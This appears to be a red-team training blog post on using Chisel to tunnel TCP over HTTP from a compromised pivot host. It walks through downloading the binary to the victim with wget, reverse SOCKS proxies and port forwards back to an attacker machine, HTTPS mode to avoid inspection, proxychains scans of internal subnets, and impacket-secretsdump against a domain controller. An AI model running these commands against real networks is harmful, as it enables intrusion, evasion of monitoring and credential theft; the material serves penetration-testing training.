top of page

MeshForge

Chisel: TCP Tunneling Over HTTP When Nothing Else Gets Through


Series: The Community's Red Team

Post: 15 of 17

Tags: chisel, pivoting, tunneling, SOCKS, proxychains, port forwarding, tools

Read time: ~10 min

Prerequisites: Post 01 — Methodology Overview


You compromised a machine. That machine sits in a DMZ — it can reach the internal network, but your attack box cannot. The firewall allows outbound HTTP from the DMZ but blocks everything else. You need to get your tools into that internal network.

Chisel builds an encrypted tunnel over HTTP. From the firewall's perspective, your traffic looks like normal web requests. On your end, you get a SOCKS5 proxy that routes any tool through the tunnel as if you were on that internal network.

This post covers Chisel's setup and the two main use cases: SOCKS proxy for full network access, and port forwarding for single-service access.


What Chisel Does

Chisel is a client/server tunneling tool written in Go. The server runs on your attack machine and waits for connections. The client runs on the compromised pivot host and connects back. Once the tunnel is established, traffic flows from your attack machine, through the tunnel, out the pivot host, and into the internal network.

The key advantage over SSH tunneling is that Chisel only needs HTTP/HTTPS connectivity from the pivot to your machine — not SSH. Many environments block outbound SSH but leave HTTP open.


Getting Chisel Onto the Pivot Host

Download the right binary for the target architecture from the releases page. For a 64-bit Linux pivot:

# Attack machine — download and serve
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz
gunzip chisel_1.9.1_linux_amd64.gz
mv chisel_1.9.1_linux_amd64 chisel
python3 -m http.server 80

On the pivot host:

wget http://<your_ip>/chisel
chmod +x chisel

For Windows pivot hosts, download the Windows binary and transfer via CrackMapExec, SMB share, or base64 encode/decode.


Use Case 1: SOCKS5 Proxy (Full Network Access)

This is the main use case. You get a SOCKS proxy on your attack machine that routes all traffic through the pivot into the internal network.

On your attack machine (runs the server):

./chisel server -p 8080 --reverse

--reverse enables reverse tunneling — the client will initiate the connection and create the tunnel in reverse. Port 8080 is the listening port.

On the pivot host (runs the client):

./chisel client <your_attack_ip>:8080 R:socks

R:socks creates a reverse SOCKS proxy. Once connected, Chisel creates a SOCKS5 listener on your attack machine at 127.0.0.1:1080.

Configure proxychains to use it:

Edit /etc/proxychains.conf. Comment out any existing socks4 line and add:

# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080

Now use proxychains to route any tool through the tunnel:

proxychains nmap -Pn -sT 172.16.5.0/24    # scan internal subnet
proxychains nmap -Pn -sT 172.16.5.19      # scan specific internal host
proxychains xfreerdp /v:172.16.5.19 /u:administrator /p:Password1
proxychains ssh user@172.16.5.10
proxychains curl http://172.16.5.50/admin

Use Case 2: Single Port Forward

When you only need to access one specific service on the internal network — an MSSQL database, an internal web app, a specific RDP target — port forwarding is cleaner than a full SOCKS proxy.

Attack machine server:

./chisel server -p 8080 --reverse

Pivot host client — forward specific port:

./chisel client <your_attack_ip>:8080 R:4444:<internal_host>:3389

This forwards port 4444 on your local machine to port 3389 (RDP) on <internal_host> through the tunnel. Connect to it directly:

xfreerdp /v:127.0.0.1:4444 /u:administrator /p:Password1

Multiple forwards in one command:

./chisel client <your_attack_ip>:8080 R:4444:<host1>:3389 R:5555:<host2>:1433

Now port 4444 on your machine reaches RDP on host1, and port 5555 reaches MSSQL on host2.


HTTPS Mode (Blend Into Encrypted Traffic)

If the environment monitors unencrypted HTTP, add TLS:

Attack machine:

./chisel server -p 443 --reverse --tls-skip-verify

Pivot host:

./chisel client --tls-skip-verify https://<your_attack_ip>:443 R:socks

The tunnel now runs over HTTPS, making it much harder to inspect in transit.


Proxychains Limitations to Know

Not every tool works transparently through proxychains:

Works: TCP-based tools — nmap (with -sT), xfreerdp, curl, wget, ssh, evil-winrm, impacket tools

Doesn't work: UDP-based tools, ICMP (ping), raw socket tools, SYN scans

Critical nmap flags when scanning through proxychains:

  • -sT — TCP connect scan (required, SYN scans won't work)

  • -Pn — skip host discovery (ICMP is blocked through SOCKS)

proxychains nmap -Pn -sT -p 22,80,443,445,3389,5985 172.16.5.10

Filtering False Positives During Scanning

If you get hundreds of "open" ports through proxychains, the proxy may be returning a connection for every port regardless. Add --open and reduce your scan scope:

proxychains nmap -Pn -sT --open -p 22,80,443,445,1433,3306,3389,5985 172.16.5.0/24

Quick Reference

# Attack machine — start server
./chisel server -p 8080 --reverse

# Pivot host — SOCKS proxy
./chisel client <attack_ip>:8080 R:socks

# Pivot host — single port forward
./chisel client <attack_ip>:8080 R:<local_port>:<internal_host>:<remote_port>

# HTTPS mode (attack machine)
./chisel server -p 443 --reverse --tls-skip-verify

# HTTPS mode (pivot host)
./chisel client --tls-skip-verify https://<attack_ip>:443 R:socks

# /etc/proxychains.conf — SOCKS5 entry
# socks5 127.0.0.1 1080

# Scan through tunnel
proxychains nmap -Pn -sT -p 22,80,443,445,3389 <internal_target>

# RDP through tunnel
proxychains xfreerdp /v:<internal_ip> /u:<user> /p:<pass>

# SSH through tunnel
proxychains ssh user@<internal_ip>

# Impacket through tunnel
proxychains impacket-secretsdump domain/admin:pass@<internal_DC>

What's Next

Post 16 covers Ligolo-ng — a more elegant pivoting solution that creates a virtual network interface on your attack machine instead of routing through proxychains. The result is that internal hosts appear directly reachable without any proxychains configuration, and native tools (including SYN scans) work without modification. It's the preferred tool for CPTS and complex multi-hop environments.

MeshForge — Training the Community's Red Team

They count on your ignorance. The exploit only works on the uninformed.

 
 
 

Comments

bottom of page